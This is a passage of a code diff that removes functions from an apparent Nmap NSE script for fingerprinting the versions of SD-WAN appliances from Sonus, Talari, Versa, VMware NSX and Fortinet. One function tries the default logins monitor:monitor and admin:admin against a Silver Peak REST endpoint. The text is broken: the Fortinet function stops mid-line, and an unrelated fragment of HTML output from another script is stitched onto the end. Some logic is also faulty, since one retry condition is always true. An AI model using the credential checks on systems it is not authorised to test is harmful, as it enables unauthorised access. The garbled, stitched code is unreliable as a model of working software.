vsdwan) - end - - return output_info, stdnse.format_output(true, output_info) - -end - -local function vsilverpeak_login(host, port) - local output_info = {} - output_info.login = {} - local monitor_check = "/rest/json/login?user=monitor&password=monitor" - local admin_check = "/rest/json/login?user=admin&password=admin" - - local resp_monitor = http.get(host, port, monitor_check) - if not resp_monitor.status then - -- force check on 80 port if empty response from 443 (by default) - resp_monitor = http.get(host, 80, monitor_check) - end - if resp_monitor.status == 200 then - table.insert(output_info.login, "Authentication successful (monitor:monitor)") - end - - local resp_admin = http.get(host, port, admin_check) - if not resp_admin.status then - -- force check on 80 port if empty response from 443 (by default) - resp_admin = http.get(host, 80, admin_check) - end - if resp_admin.status == 200 then - table.insert(output_info.login, "Authentication successful (admin:admin)") - end - - if next(output_info.login) ~= nil then - return output_info, stdnse.format_output(true, output_info) - end -end - - -local function vsonus_edge(host, port) - local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/cgi/index.php" - local response - local output_info = {} - local vsdwan = "" - local urlp = path - - response = http.generic_request(host, port, "GET", path) - - if response.status == 301 or response.status == 302 then - local url_parse_res = url.parse(response.header.location) - urlp = url_parse_res.path - stdnse.print_debug("Status code: " .. 
response.status)
- response = http.generic_request(host,port,"GET", urlp)
- end
-
- output_info = stdnse.output_table()
-
- if response == nil then
- return fail("Request failed")
- end
-
- local try_counter = 1
-
- while try_counter < 6 and response.status ~= 200 do
- response = http.generic_request(host, port, "GET", urlp)
- try_counter = try_counter + 1
- end
-
- if response.status == 200 then
-
- found, matches = http.response_contains(response, "/style/([.0-9]+)%-[0-9]+%_rel", false)
- if found == true then vsdwan = matches[1] else return nil end
-
- output_info.vsdwan_version = {}
- table.insert(output_info.vsdwan_version, "Sonus Edge Version: " .. vsdwan)
- end
-
- return output_info, stdnse.format_output(true, output_info)
-
-end
-
-
-local function vsonus_mgmt(host, port)
- local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/"
- local response
- local output_info = {}
- local vsdwan = ""
- local urlp = path
-
- response = http.generic_request(host, port, "GET", path)
-
- if response.status == 301 or response.status == 302 then
- local url_parse_res = url.parse(response.header.location)
- urlp = url_parse_res.path
- stdnse.print_debug("Status code: " .. response.status)
- response = http.generic_request(host,port,"GET", urlp)
- end
-
- output_info = stdnse.output_table()
-
- if response == nil then
- return fail("Request failed")
- end
-
- local try_counter = 1
-
- while try_counter < 6 and (response.status ~= 503 or response.status ~= 200) do
- response = http.generic_request(host, port, "GET", urlp)
- try_counter = try_counter + 1
- end
-
- if response.status == 503 or response.status == 200 then
-
- found, matches = http.response_contains(response, "EMA ([.0-9]+)", false)
- if found == true then vsdwan = matches[1] else return nil end
-
- output_info.vsdwan_version = {}
- table.insert(output_info.vsdwan_version, "Sonus Mgmt App Version: " ..
vsdwan)
- end
-
- return output_info, stdnse.format_output(true, output_info)
-
-end
-
-
-local function vtalari(host, port)
- local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/"
- local response
- local output_info = {}
- local vsdwan = ""
- local urlp = path
-
- response = http.generic_request(host, port, "GET", path)
-
- if response.status == 301 or response.status == 302 then
- local url_parse_res = url.parse(response.header.location)
- urlp = url_parse_res.path
- stdnse.print_debug("Status code: " .. response.status)
- response = http.generic_request(host,port,"GET", urlp)
- end
-
- output_info = stdnse.output_table()
-
- if response == nil then
- return fail("Request failed")
- end
-
- local try_counter = 1
-
- while try_counter < 6 and response.status ~= 200 do
- response = http.generic_request(host, port, "GET", urlp)
- try_counter = try_counter + 1
- end
-
- if response.status == 200 then
-
- found, matches = http.response_contains(response, 'talari%.css%?([_.0-9A-Za-z]+)"', false)
- if found == true then vsdwan = matches[1] else return nil end
-
- output_info.vsdwan_version = {}
- table.insert(output_info.vsdwan_version, "Talari Version: " .. vsdwan)
- end
-
- return output_info, stdnse.format_output(true, output_info)
-
-end
-
-
-local function vversa_analytics(host, port)
- local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/versa/app/js/common/constants.js"
- local response
- local output_info = {}
- local vsdwan = ""
- local urlp = path
-
- response = http.generic_request(host, port, "GET", path)
-
- if response.status == 301 or response.status == 302 then
- local url_parse_res = url.parse(response.header.location)
- urlp = url_parse_res.path
- stdnse.print_debug("Status code: " ..
response.status)
- response = http.generic_request(host,port,"GET", urlp)
- end
-
- output_info = stdnse.output_table()
-
- if response == nil then
- return fail("Request failed")
- end
-
- local try_counter = 1
-
- while try_counter < 6 and response.status ~= 200 do
- response = http.generic_request(host, port, "GET", urlp)
-
- found, matches = http.response_contains(response, '0;url%=(.*)"%/%>')
-
- if found == true then
- local urltmp = url.parse(matches[1])
- urlp = urltmp.path
- response = http.generic_request(host, port, "GET", urlp)
- try_counter = 1
- end
- try_counter = try_counter + 1
- end
-
- if response.status == 200 then
-
- found, matches = http.response_contains(response, "%/analytics%/([v.0-9]+)%/", false)
- if found == true then vsdwan = matches[1] else return nil end
-
- output_info.vsdwan_version = {}
- table.insert(output_info.vsdwan_version, "Versa Analytics Version: " .. vsdwan)
- end
-
- return output_info, stdnse.format_output(true, output_info)
-
-end
-
-
-local function vversa_flex(host, port)
- local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/scripts/main-layout/main-layout-controller.js"
- local response
- local output_info = {}
- local vsdwan = ""
- local urlp = path
-
- response = http.generic_request(host, port, "GET", path)
-
- if response.status == 301 or response.status == 302 then
- local url_parse_res = url.parse(response.header.location)
- urlp = url_parse_res.path
- stdnse.print_debug("Status code: " ..
response.status)
- response = http.generic_request(host,port,"GET", urlp)
- end
-
- output_info = stdnse.output_table()
-
- if response == nil then
- return fail("Request failed")
- end
-
- local try_counter = 1
-
- while try_counter < 6 and response.status ~= 200 do
- response = http.generic_request(host, port, "GET", urlp)
- try_counter = try_counter + 1
- end
-
- if response.status == 200 then
-
- found, matches = http.response_contains(response, '"versa%-flexvnf%-([.0-9%-a-zA-Z]+)', false)
- if found == true then vsdwan = matches[1] else return nil end
-
- output_info.vsdwan_version = {}
- table.insert(output_info.vsdwan_version, "Versa Flex Version: " .. vsdwan)
- end
-
- return output_info, stdnse.format_output(true, output_info)
-
-end
-
-
-local function vvmware_nsx(host, port)
- local path = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/"
- local response
- local output_info = {}
- local vsdwan = ""
- local urlp = path
-
- response = http.generic_request(host, port, "GET", path)
-
- if response.status == 301 or response.status == 302 then
- local url_parse_res = url.parse(response.header.location)
- urlp = url_parse_res.path
- stdnse.print_debug("Status code: " .. response.status)
- response = http.generic_request(host,port,"GET", urlp)
- end
-
- output_info = stdnse.output_table()
-
- if response == nil then
- return fail("Request failed")
- end
-
- local try_counter = 1
-
- while try_counter < 6 and response.status ~= 200 do
- response = http.generic_request(host, port, "GET", urlp)
- try_counter = try_counter + 1
- end
-
- if response.status == 200 then
-
- found, matches = http.response_contains(response, "%/vco%-ui.([0-9.]+).", false)
- if found == true then vsdwan = matches[1] else return nil end
-
- output_info.vsdwan_version = {}
- table.insert(output_info.vsdwan_version, "VMware NSX Version: " ..
vsdwan)
- end
-
- return output_info, stdnse.format_output(true, output_info)
-
-end
-
-
-local function fortinet(host, port)
- local resp_js_path, js_path, resp_js
- local conf_build, conf_model, conf_label
- local output_info = {}
- local version
-
- -- trigger 401 error to find path to js file with version
- resp_js_path = http.get(host, port, "/api")
- if not resp_js_path.body then
- return nil
- end
-
- -- search for js file that contains version
- js_path = string.match(resp_js_path.body:lower(), "
IPmirrorstatussizedeviceserverwww-authenticate header
'.. port.service ..'://' .. host.ip ..':' .. port.number ..'
http://' .. host.ip ..':' .. port.number ..'[mirror]['.. siexiste(query.status) ..'] '.. string.len(siexiste(query.body)) ..' B'.. siexiste(categoria(serverstring)) ..'  '.. siexiste(query.header['server']) ..'  '.. siexiste(query.header['www-authenticate']) ..'